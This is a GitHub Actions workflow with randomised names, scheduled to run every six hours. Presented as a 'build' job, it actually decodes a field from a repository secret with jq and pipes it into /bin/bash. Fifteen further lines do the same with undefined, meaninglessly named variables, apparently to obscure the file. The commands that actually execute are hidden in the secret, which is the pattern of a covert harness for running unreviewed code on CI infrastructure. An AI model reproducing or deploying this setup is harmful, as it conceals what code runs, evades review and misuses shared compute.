name: wushenjiao4567
on:
  workflow_dispatch:
  schedule:
    - cron: '51 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wushenjiao4567
        env:
          z2552: ${{ secrets.z2552 }}
        run: |
          echo $z2552 | jq -r .x565 | /bin/bash
          echo $zkj73 | jq -r .zxp9 | /bin/bash
          echo $cglq29 | jq -r .xba287 | /bin/bash
          echo $dgq695 | jq -r .oeta9 | /bin/bash
          echo $wwe381 | jq -r .g950 | /bin/bash
          echo $ideb03009 | jq -r .jlnra038 | /bin/bash
          echo $oedmc1 | jq -r .qxx743 | /bin/bash
          echo $tgoi66 | jq -r .gbkol68 | /bin/bash
          echo $fx4843 | jq -r .lylf17 | /bin/bash
          echo $wchr082 | jq -r .mczb22741 | /bin/bash
          echo $lppy661 | jq -r .rroe34 | /bin/bash
          echo $ivcph8246 | jq -r .qokt27720 | /bin/bash
          echo $omda965 | jq -r .ywiz4 | /bin/bash
          echo $dodpe54556 | jq -r .fem3 | /bin/bash
          echo $r95131 | jq -r .zk8300 | /bin/bash
          echo $mz1 | jq -r .yd75 | /bin/bash

